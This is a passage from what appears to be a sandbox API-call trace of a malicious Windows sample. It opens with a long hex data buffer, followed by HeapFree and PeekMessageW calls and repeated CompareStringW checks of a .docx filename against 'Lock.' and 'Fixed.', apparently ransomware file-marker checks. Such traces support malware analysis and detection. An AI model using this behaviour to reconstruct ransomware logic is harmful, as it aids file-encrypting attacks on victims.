xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0265.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.202] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0265.202] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.202] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MzqysNw1q1np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zqysNw1q1np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qysNw1q1np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ysNw1q1np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sNw1q1np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nw1q1np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w1q1np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1q1np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q1np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="np8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jj.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.204] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MzqysNw1q1np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zqysNw1q1np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qysNw1q1np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ysNw1q1np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sNw1q1np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nw1q1np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w1q1np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1q1np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q1np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="np8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jj.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0265.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.205] 